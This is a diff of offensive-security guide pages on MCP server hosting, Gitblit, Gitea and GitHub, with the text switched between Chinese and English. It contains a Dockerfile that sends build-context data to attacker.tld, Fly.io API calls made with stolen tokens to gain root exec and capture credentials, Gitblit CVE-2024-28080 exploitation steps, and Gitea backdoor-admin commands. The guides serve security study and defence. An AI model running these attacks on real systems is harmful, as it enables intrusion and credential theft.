- Dockerfile 必须位于所选的 context 路径内,并且其路径必须事先已知。
- build user 必须对包含在 context 中的文件具有读取权限;特殊设备文件可能会破坏复制过程。
## PoC: Path traversal via Docker build context
Example malicious server config declaring a Dockerfile within the parent directory context:
```yaml
runtime: "container"
build:
dockerfile: "test/Dockerfile" # Must reside inside the final context
dockerBuildPath: ".." # Path traversal to builder user $HOME
startCommand:
type: "http"
configSchema:
type: "object"
properties:
apiKey:
type: "string"
required: ["apiKey"]
exampleConfig:
apiKey: "sk-example123"
```
注意:
- 使用 '..' 通常会解析到 builder 用户的主目录(例如 /home/builder该目录通常包含敏感文件。
- 将 Dockerfile 放在仓库的目录名下例如repo "test" → test/Dockerfile以便它保持在展开的父上下文内。
## PoC: Dockerfile to ingest and exfiltrate the host context
```dockerfile
FROM alpine
RUN apk add --no-cache curl
RUN mkdir /data
COPY . /data # Copies entire build context (now builders $HOME)
RUN curl -si https://attacker.tld/?d=$(find /data | base64 -w 0)
```
通常从 $HOME 恢复的目标:
- ~/.docker/config.json (registry auths/tokens)
- 其他 cloud/CLI 缓存和配置(例如 ~/.fly, ~/.kube, ~/.aws, ~/.config/*
提示:即使仓库中包含 .dockerignore易受攻击的平台端 context selection 仍然决定发送到 daemon 的内容。如果平台在评估你仓库的 .dockerignore 之前将所选路径复制到 daemon主机文件仍可能被暴露。
## 使用过度权限 tokens 进行 Cloud pivot示例Fly.io Machines API
某些平台会颁发一个可同时用于 container registry 和 control-plane API 的 bearer token。如果你 exfiltrate 了一个 registry token尝试用它访问 provider 的 API。
使用从 ~/.docker/config.json 获取的被盗 token 对 Fly.io Machines API 发起的示例 API 调用:
列举组织中的 apps
```bash
curl -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps?org_slug=smithery"
```
在任意 app 的任何机器内以 root 身份运行命令:
```bash
curl -s -X POST -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
--data '{"cmd":"","command":["id"],"container":"","stdin":"","timeout":5}'
```
结果:在 token 拥有足够权限的情况下,可对所有托管应用实现整个组织范围的 remote code execution。
## 从被攻陷的托管服务窃取 Secret
在对托管服务器取得 exec/RCE 后,你可以窃取 client-supplied secrets (API keys, tokens) 或发起 prompt-injection 攻击。示例:安装 tcpdump 并在端口 8080 捕获 HTTP 流量以提取 inbound credentials。
```bash
# Install tcpdump inside the machine
curl -s -X POST -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
--data '{"cmd":"apk add tcpdump","command":[],"container":"","stdin":"","timeout":5}'
# Capture traffic
curl -s -X POST -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
--data '{"cmd":"tcpdump -i eth0 -w /tmp/log tcp port 8080","command":[],"container":"","stdin":"","timeout":5}'
```
捕获的请求通常在 headers、bodies 或 query params 中包含客户端凭证。
## 参考资料
- [Breaking MCP Server Hosting: Build-Context Path Traversal to Org-wide RCE and Secret Theft](https://blog.gitguardian.com/breaking-mcp-server-hosting/)
- [Fly.io Machines API](https://fly.io/docs/machines/api/)
{{#include ../banners/hacktricks-training.md}}

View File

@@ -1,12 +1,12 @@
# Gitblit 安全
# Gitblit Security
{{#include ../../banners/hacktricks-training.md}}
## 什么是 Gitblit
## What is Gitblit
Gitblit 是一个用 Java 编写的自托管 Git 服务器。它可以作为独立的 JAR 运行或在 servlet 容器中部署,并提供一个嵌入式 SSH 服务 (Apache MINA SSHD) 用于 Git over SSH
Gitblit is a selfhosted Git server written in Java. It can run as a standalone JAR or in servlet containers and ships an embedded SSH service (Apache MINA SSHD) for Git over SSH.
## 主题
## Topics
- Gitblit Embedded SSH Auth Bypass (CVE-2024-28080)
@@ -14,8 +14,8 @@ Gitblit 是一个用 Java 编写的自托管 Git 服务器。它可以作为独
gitblit-embedded-ssh-auth-bypass-cve-2024-28080.md
{{#endref}}
## 参考
## References
- [Gitblit project](https://gitblit.com/)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -4,76 +4,80 @@
## Summary
CVE-2024-28080 是 Gitblit 嵌入式 SSH 服务中的一个认证绕过漏洞,原因是在与 Apache MINA SSHD 集成时会话状态处理不正确。如果一个用户账户至少注册了一个 SSH 公钥,攻击者只要知道该用户名和任意一个该用户的公钥,就可以在不拥有私钥且不输入密码的情况下完成认证。
CVE-2024-28080 is an authentication bypass in Gitblits embedded SSH service due to incorrect session state handling when integrating with Apache MINA SSHD. If a user account has at least one SSH public key registered, an attacker who knows the username and any of that users public keys can authenticate without the private key and without the password.
- Affected: Gitblit < 1.10.0 (observed on 1.9.3)
- Fixed: 1.10.0
- Requirements to exploit:
- Git over SSH enabled on the instance
- 受害账号在 Gitblit 中至少注册了一个 SSH 公钥
- 攻击者知道受害者用户名和他们的某个公钥(通常可发现,例如 https://github.com/<username>.keys
- Git over SSH enabled on the instance
- Victim account has at least one SSH public key registered in Gitblit
- Attacker knows victim username and one of their public keys (often discoverable, e.g., https://github.com/<username>.keys)
## Root cause (state leaks between SSH methods)
RFC 4252 中,publickey authentication 分为两个阶段:服务器先检查提供的公钥是否对某个用户名可接受,只有在挑战/响应带有签名之后才真正认证该用户。在 MINA SSHD 中,PublickeyAuthenticator 会被调用两次:在 key acceptance尚无签名时以及在客户端返回签名之后。
In RFC 4252, publickey authentication proceeds in two phases: the server first checks whether a provided public key is acceptable for a username, and only after a challenge/response with a signature does it authenticate the user. In MINA SSHD, the PublickeyAuthenticator is invoked twice: on key acceptance (no signature yet) and later after the client returns a signature.
Gitblit PublickeyAuthenticator 在第一次(签名前)的调用中会修改会话上下文,通过将已认证的 UserModel 绑定到会话并返回 true(“key acceptable。当认证之后回退到密码时PasswordAuthenticator 信任该被修改的会话状态并短路,返回 true 而不验证密码。因此,在先前对同一用户发生过 publickey acceptance” 后,任何密码(包括空密码)都会被接受。
Gitblits PublickeyAuthenticator mutated the session context on the first, presignature call by binding the authenticated UserModel to the session and returning true ("key acceptable"). When authentication later fell back to password, the PasswordAuthenticator trusted that mutated session state and shortcircuited, returning true without validating the password. As a result, any password (including empty) was accepted after a prior publickey "acceptance" for the same user.
Highlevel flawed flow:
1) 客户端提供 username + public key(尚无签名)
2) 服务器识别该 key 属于该用户并过早地将用户附加到会话,返回 trueacceptable”)
3) 客户端无法签名(无私钥),于是认证回退到密码
4) Password auth 看到会话中已有用户并无条件返回成功
1) Client offers username + public key (no signature yet)
2) Server recognizes the key as belonging to the user and prematurely attaches user to the session, returns true ("acceptable")
3) Client cannot sign (no private key), so auth falls back to password
4) Password auth sees a user already present in session and unconditionally returns success
## Stepbystep exploitation
- 收集受害者的用户名和他们的某个公钥:
- GitHub https://github.com/<username>.keys 暴露公钥
- 公共服务器通常会暴露 authorized_keys
- 配置 OpenSSH 仅呈现公钥部分以使签名生成失败,强制回退到密码,同时仍触发服务器上的 publickey acceptance 路径。
- Collect a victims username and one of their public keys:
- GitHub exposes public keys at https://github.com/<username>.keys
- Public servers often expose authorized_keys
- Configure OpenSSH to present only the public half so signature generation fails, forcing a fallback to password while still triggering the publickey acceptance path on the server.
Example SSH client config (no private key available):
```sshconfig
# ~/.ssh/config
Host gitblit-target
HostName <host-or-ip>
User <victim-username>
PubkeyAuthentication yes
PreferredAuthentications publickey,password
IdentitiesOnly yes
IdentityFile ~/.ssh/victim.pub # public half only (no private key present)
HostName <host-or-ip>
User <victim-username>
PubkeyAuthentication yes
PreferredAuthentications publickey,password
IdentitiesOnly yes
IdentityFile ~/.ssh/victim.pub # public half only (no private key present)
```
连接并在密码提示时按 Enter或输入任意字符串
Connect and press Enter at the password prompt (or type any string):
```bash
ssh gitblit-target
# or Git over SSH
GIT_SSH_COMMAND="ssh -F ~/.ssh/config" git ls-remote ssh://<victim-username>@<host>/<repo.git>
```
Authentication succeeds because the earlier publickey phase mutated the session to an authenticated user, and password auth incorrectly trusts that state.
Note: If ControlMaster multiplexing is enabled in your SSH config, subsequent Git commands may reuse the authenticated connection, increasing impact.
## Impact
- 完全冒充任何至少注册了一个 SSH publickey 的 Gitblit 用户
- 根据受害者权限对仓库的读/写访问(可能导致 source exfiltration、未经授权的 pushessupplychain 风险)
- 如果针对管理员用户,可能产生管理权限影响
- 纯网络漏洞利用;无需暴力破解或私钥
- Full impersonation of any Gitblit user with at least one registered SSH public key
- Read/write access to repositories per victims permissions (source exfiltration, unauthorized pushes, supplychain risks)
- Potential administrative impact if targeting an admin user
- Pure network exploit; no brute force or private key required
## Detection ideas
- 检查 SSH 日志查找序列publickey 尝试之后,紧接着以空或非常短的 password 成功通过认证
- 查找流程:publickey method 提供不受支持/不匹配的 key material随后针对同一用户名立即出现 password 成功
- Review SSH logs for sequences where a publickey attempt is followed by a successful password authentication with an empty or very short password
- Look for flows: publickey method offering unsupported/mismatched key material followed by immediate password success for the same username
## Mitigations
- 升级到 Gitblit v1.10.0+
- 在升级之前:
- 禁用 Gitblit 上的 Git over SSH
- 限制对 SSH 服务的网络访问,并
- 监控上述所述的可疑模式
- 如果怀疑被入侵,请轮换受影响用户的凭证
- Upgrade to Gitblit v1.10.0+
- Until upgraded:
- Disable Git over SSH on Gitblit, or
- Restrict network access to the SSH service, and
- Monitor for suspicious patterns described above
- Rotate affected user credentials if compromise is suspected
## General: abusing SSH auth method stateleakage (MINA/OpenSSHbased services)
@@ -88,8 +92,8 @@ Practical tips:
- Public key harvesting at scale: pull public keys from common sources such as https://github.com/<username>.keys, organizational directories, team pages, leaked authorized_keys
- Forcing signature failure (clientside): point IdentityFile to only the .pub, set IdentitiesOnly yes, keep PreferredAuthentications to include publickey then password
- MINA SSHD integration pitfalls:
- PublickeyAuthenticator.authenticate(...) must not attach user/session state until the postsignature verification path confirms the signature
- PasswordAuthenticator.authenticate(...) must not infer success from any state mutated during a prior, incomplete authentication method
- PublickeyAuthenticator.authenticate(...) must not attach user/session state until the postsignature verification path confirms the signature
- PasswordAuthenticator.authenticate(...) must not infer success from any state mutated during a prior, incomplete authentication method
Related protocol/design notes and literature:
- SSH userauth protocol: RFC 4252 (publickey method is a twostage process)

View File

@@ -1,130 +1,141 @@
# Gitea 安全
# Gitea Security
{{#include ../../banners/hacktricks-training.md}}
## 什么是 Gitea
## What is Gitea
**Gitea** 是一个 **自托管的社区管理轻量级代码托管** 解决方案,使用 Go 编写。
**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go.
![](<../../images/image (160).png>)
### 基本信息
### Basic Information
{{#ref}}
basic-gitea-information.md
{{#endref}}
## 实验室
## Lab
To run a Gitea instance locally you can just run a docker container:
要在本地运行 Gitea 实例,您只需运行一个 docker 容器:
```bash
docker run -p 3000:3000 gitea/gitea
```
连接到端口 3000 以访问网页。
您也可以使用 kubernetes 运行它:
Connect to port 3000 to access the web page.
You could also run it with kubernetes:
```
helm repo add gitea-charts https://dl.gitea.io/charts/
helm install gitea gitea-charts/gitea
```
## 未认证枚举
- 公共仓库: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
- 注册用户: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
- 注册组织: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
## Unauthenticated Enumeration
请注意,**默认情况下 Gitea 允许新用户注册**。这不会给新用户提供对其他组织/用户仓库的特别有趣的访问权限,但**登录用户**可能能够**查看更多的仓库或组织**。
- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
## 内部利用
Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**.
在这个场景中,我们假设你已经获得了一些对 GitHub 账户的访问权限。
## Internal Exploitation
### 使用用户凭证/网页 Cookie
For this scenario we are going to suppose that you have obtained some access to a github account.
如果你以某种方式已经获得了组织内某个用户的凭证(或者你偷了一个会话 Cookie你可以**直接登录**并检查你对哪些**仓库**拥有**权限**,你在**哪些团队**中,**列出其他用户**,以及**仓库是如何保护的**。
### With User Credentials/Web Cookie
请注意,**可能会使用 2FA**,因此你只有在能够**通过该检查**的情况下才能访问这些信息。
If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.**
Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
> [!NOTE]
> 请注意,如果你**设法偷取了 `i_like_gitea` cookie**(当前配置为 SameSite: Lax你可以**完全冒充该用户**而无需凭证或 2FA
> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
### 使用用户 SSH 密钥
### With User SSH Key
Gitea 允许**用户**设置**SSH 密钥**,该密钥将作为**代表他们部署代码的身份验证方法**(不适用 2FA
Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to:
使用此密钥,你可以对用户拥有某些权限的**仓库进行更改**,但是你不能使用它访问 Gitea API 来枚举环境。然而,你可以**枚举本地设置**以获取有关你有访问权限的仓库和用户的信息:
```bash
# Go to the the repository folder
# Get repo config and current user name and email
git config --list
```
如果用户将其用户名配置为他的 gitea 用户名,您可以在 _https://github.com/\<gitea_username>.keys_ 中访问他在账户中设置的 **公钥**,您可以检查此项以确认您找到的私钥是否可以使用。
**SSH 密钥** 也可以在仓库中设置为 **部署密钥**。任何拥有此密钥的人都能够 **从仓库启动项目**。通常在具有不同部署密钥的服务器上,本地文件 **`~/.ssh/config`** 将提供与密钥相关的信息。
If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\<gitea_username>.keys_, you could check this to confirm the private key you found can be used.
#### GPG 密钥
**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
如 [**这里**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) 所述,有时需要签署提交,否则您可能会被发现。
#### GPG Keys
As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
Check locally if the current user has any key with:
在本地检查当前用户是否有任何密钥:
```shell
gpg --list-secret-keys --keyid-format=long
```
### 使用用户令牌
有关[**用户令牌的介绍,请查看基本信息**](basic-gitea-information.md#personal-access-tokens)。
### With User Token
用户令牌可以**替代密码**来**验证**对Gitea服务器的访问[**通过API**](https://try.gitea.io/api/swagger#/)。它将对用户拥有**完全访问权限**。
For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
### 使用Oauth应用程序
A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user.
有关[**Gitea Oauth应用程序的介绍请查看基本信息**](./#with-oauth-application)。
### With Oauth Application
攻击者可能会创建一个**恶意Oauth应用程序**,以访问接受它们的用户的特权数据/操作,这可能是网络钓鱼活动的一部分。
For an introduction about [**Gitea Oauth Applications check the basic information**](#with-oauth-application).
如基本信息中所述,该应用程序将对用户帐户拥有**完全访问权限**。
An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
### 分支保护绕过
As explained in the basic information, the application will have **full access over the user account**.
在Github中我们有**github actions**,默认情况下会获取对仓库的**写访问权限**的**令牌**,可以用来**绕过分支保护**。在这种情况下,**不存在**,因此绕过的方式更有限。但让我们看看可以做些什么:
### Branch Protection Bypass
- **启用推送**:如果任何具有写访问权限的人可以推送到该分支,只需推送即可。
- **白名单限制推送**:同样,如果您是此列表的一部分,请推送到该分支。
- **启用合并白名单**:如果有合并白名单,您需要在其中。
- **要求批准大于0**:那么...您需要妥协另一个用户。
- **限制批准给白名单用户**:如果只有白名单用户可以批准...您需要妥协另一个在该列表中的用户。
- **撤销过期批准**如果批准未随新提交而被移除您可以劫持已批准的PR以注入您的代码并合并PR。
In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done:
请注意,**如果您是组织/仓库管理员**,您可以绕过保护。
- **Enable Push**: If anyone with write access can push to the branch, just push to it.
- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch.
- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it
- **Require approvals is bigger than 0**: Then... you need to compromise another user
- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list
- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR.
### 枚举Webhooks
Note that **if you are an org/repo admin** you can bypass the protections.
**Webhooks**能够**将特定的gitea信息发送到某些地方**。您可能能够**利用这种通信**。\
然而,通常在**webhook**中设置了一个您**无法检索**的**密钥**,这将**防止**外部用户知道webhook的URL但不知道密钥来**利用该webhook**。\
但在某些情况下,人们不是将**密钥**设置在其位置,而是将其**作为参数设置在URL中**,因此**检查URL**可能会让您**找到密钥**和其他您可以进一步利用的地方。
### Enumerate Webhooks
Webhooks可以在**仓库和组织级别**设置。
**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\
But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further.
## 后期利用
Webhooks can be set at **repo and at org level**.
### 服务器内部
## Post Exploitation
如果您以某种方式成功进入运行gitea的服务器您应该搜索gitea配置文件。默认情况下它位于`/data/gitea/conf/app.ini`
### Inside the server
在此文件中,您可以找到**密钥**和**密码**。
If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini`
在gitea路径默认/data/gitea您还可以找到有趣的信息例如
In this file you can find **keys** and **passwords**.
- **sqlite**数据库如果gitea不使用外部数据库它将使用sqlite数据库。
- **会话**在会话文件夹中:运行`cat sessions/*/*/*`可以查看已登录用户的用户名gitea也可以将会话保存在数据库中
- **jwt私钥**在jwt文件夹中。
- 该文件夹中可能会找到更多**敏感信息**。
In the gitea path (by default: /data/gitea) you can find also interesting information like:
如果您在服务器内部,您还可以**使用`gitea`二进制文件**来访问/修改信息:
- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db
- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB).
- The **jwt private key** inside the jwt folder
- More **sensitive information** could be found in this folder
- `gitea dump`将转储gitea并生成一个.zip文件。
- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET`将生成指定类型的令牌(持久性)。
- `gitea admin user change-password --username admin --password newpassword`更改密码。
- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token`创建新管理员用户并获取访问令牌。
If you are inside the server you can also **use the `gitea` binary** to access/modify information:
- `gitea dump` will dump gitea and generate a .zip file
- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence)
- `gitea admin user change-password --username admin --password newpassword` Change the password
- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,103 +1,106 @@
# 基本 Gitea 信息
# Basic Gitea Information
{{#include ../../banners/hacktricks-training.md}}
## 基本结构
## Basic Structure
基本的 Gitea 环境结构是通过 **组织** 来分组仓库,每个组织可以包含 **多个仓库** **多个团队**。然而,请注意,就像在 GitHub 中一样,用户可以在组织外拥有仓库。
The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization.
此外,**用户** 可以是 **不同组织的成员**。在组织内,用户可能对每个仓库拥有 **不同的权限**
Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**.
用户也可以是 **不同团队的一部分**,对不同仓库拥有不同的权限。
A user may also be **part of different teams** with different permissions over different repos.
最后,**仓库可能具有特殊的保护机制**。
And finally **repositories may have special protection mechanisms**.
## 权限
## Permissions
### 组织
### Organizations
**组织被创建** 时,会创建一个名为 **Owners** 的团队,并将用户放入其中。该团队将提供对 **组织****管理员访问**,这些 **权限** 和团队的 **名称** **无法修改**
When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
**组织管理员**(所有者)可以选择组织的 **可见性**
**Org admins** (owners) can select the **visibility** of the organization:
- 公开
- 限制(仅登录用户)
- 私有(仅成员)
- Public
- Limited (logged in users only)
- Private (members only)
**组织管理员** 还可以指示 **仓库管理员** 是否可以 **添加或移除团队的访问权限**。他们还可以指示最大仓库数量。
**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos.
创建新团队时,会选择几个重要设置:
When creating a new team, several important settings are selected:
- 指定 **团队成员可以访问的组织仓库**:特定仓库(团队被添加的仓库)或所有仓库。
- 还指示 **成员是否可以创建新仓库**(创建者将获得对其的管理员访问)。
- **成员** 在仓库中将 **拥有的权限**
- **管理员** 访问
- **特定** 访问:
- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all.
- It's also indicated **if members can create new repos** (creator will get admin access to it)
- The **permissions** the **members** of the repo will **have**:
- **Administrator** access
- **Specific** access:
![](<../../images/image (118).png>)
### 团队与用户
### Teams & Users
在仓库中,**组织管理员** 和 **仓库管理员**(如果组织允许)可以 **管理** 分配给协作者(其他用户)和团队的角色。可能的 **角色** **3** 种:
In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
- 管理员
- 写入
- 读取
- Administrator
- Write
- Read
## Gitea 认证
## Gitea Authentication
### 网络访问
### Web Access
使用 **用户名 + 密码**,并可能(推荐)使用 2FA
Using **username + password** and potentially (and recommended) a 2FA.
### **SSH 密钥**
### **SSH Keys**
您可以使用一个或多个公钥配置您的帐户,允许相关的 **私钥代表您执行操作** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
#### **GPG 密钥**
#### **GPG Keys**
**无法使用这些密钥冒充用户**,但如果您不使用它,可能会导致您 **因发送未签名的提交而被发现**
You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**.
### **个人访问令牌**
### **Personal Access Tokens**
您可以生成个人访问令牌,以 **授予应用程序访问您的帐户**。个人访问令牌对您的帐户具有完全访问权限:[http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
### Oauth 应用程序
### Oauth Applications
与个人访问令牌一样,**Oauth 应用程序** 将对您的帐户及其访问的地方具有 **完全访问权限**,因为如 [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes) 中所述,范围尚不支持:
Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
![](<../../images/image (194).png>)
### 部署密钥
### Deploy keys
部署密钥可能对仓库具有只读或写入访问权限,因此它们可能对攻破特定仓库很有趣。
Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
## 分支保护
## Branch Protections
分支保护旨在 **不将仓库的完全控制权授予用户**。目标是 **在能够在某个分支内写入代码之前设置几种保护方法**
Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
**仓库的分支保护** 可以在 _https://localhost:3000/\<orgname>/\<reponame>/settings/branches_ 中找到。
The **branch protections of a repository** can be found in _https://localhost:3000/\<orgname>/\<reponame>/settings/branches_
> [!NOTE]
> **无法在组织级别设置分支保护**。因此,所有保护必须在每个仓库中声明。
> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
可以对分支(例如主分支)应用不同的保护:
Different protections can be applied to a branch (like to master):
- **禁用推送**:无人可以推送到此分支
- **启用推送**:任何有访问权限的人都可以推送,但不能强制推送。
- **白名单限制推送**:只有选定的用户/团队可以推送到此分支(但不能强制推送)
- **启用合并白名单**:只有白名单中的用户/团队可以合并 PR
- **启用状态检查**:合并前需要通过状态检查。
- **要求批准**:指示合并 PR 之前所需的批准数量。
- **限制批准给白名单**:指示可以批准 PR 的用户/团队。
- **在拒绝审查时阻止合并**:如果请求更改,则无法合并(即使其他检查通过)
- **在官方审查请求时阻止合并**:如果有官方审查请求,则无法合并
- **撤销过期的批准**:当有新提交时,旧的批准将被撤销。
- **要求签名提交**:提交必须签名。
- **如果拉取请求过时则阻止合并**
- **受保护/不受保护的文件模式**:指示要保护/不保护的文件模式
- **Disable Push**: No-one can push to this branch
- **Enable Push**: Anyone with access can push, but not force push.
- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push)
- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs.
- **Enable Status checks:** Require status checks to pass before merging.
- **Require approvals**: Indicate the number of approvals required before a PR can be merged.
- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs.
- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass)
- **Block merge on official review requests**: If there official review requests it cannot be merged
- **Dismiss stale approvals**: When new commits, old approvals will be dismissed.
- **Require Signed Commits**: Commits must be signed.
- **Block merge if pull request is outdated**
- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes
> [!NOTE]
> 如您所见,即使您设法获得某个用户的凭据,**仓库可能受到保护,避免您将代码推送到主分支**,例如以攻破 CI/CD 管道。
> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,236 +2,249 @@
{{#include ../../banners/hacktricks-training.md}}
## 什么是Github
## What is Github
(来自 [这里](https://kinsta.com/knowledgebase/what-is-github/)) 从高层次来看,**GitHub是一个网站和基于云的服务帮助开发者存储和管理他们的代码以及跟踪和控制代码的更改**。
(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.
### 基本信息
### Basic Information
{{#ref}}
basic-github-information.md
{{#endref}}
## 外部侦查
## External Recon
Github 仓库可以配置为公共、私有和内部。
Github repositories can be configured as public, private and internal.
- **私有**意味着**只有**组织中的人才能访问它们
- **内部**意味着**只有**企业中的人(一个企业可能有多个组织)才能访问它
- **公共**意味着**所有互联网**用户都可以访问它。
- **Private** means that **only** people of the **organisation** will be able to access them
- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it
- **Public** means that **all internet** is going to be able to access it.
如果你知道**要针对的用户、仓库或组织**,你可以使用**github dorks**来查找敏感信息或搜索**每个仓库中的敏感信息泄露**。
In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.
### Github Dorks
Github 允许**通过指定用户、仓库或组织作为范围来搜索某些内容**。因此,使用一系列将出现在敏感信息附近的字符串,你可以轻松地**搜索目标中的潜在敏感信息**。
Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.
工具(每个工具包含其 dorks 列表):
Tools (each tool contains its list of dorks):
- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) [Dorks 列表](https://github.com/obheda12/GitDorker/tree/master/Dorks)
- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) [Dorks 列表](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)
- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) [Dorks 列表](https://github.com/hisxo/gitGraber/tree/master/wordlists)
- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks))
- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))
### Github 泄露
### Github Leaks
请注意github dorks 也旨在使用 github 搜索选项查找泄露。此部分专门介绍那些将**下载每个仓库并搜索其中敏感信息**的工具(甚至检查某些提交的深度)。
Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).
工具(每个工具包含其正则表达式列表):
Tools (each tool contains its list of regexes):
查看此页面:**[https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.html](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.html)**
Check this page: **[https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.html](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.html)**
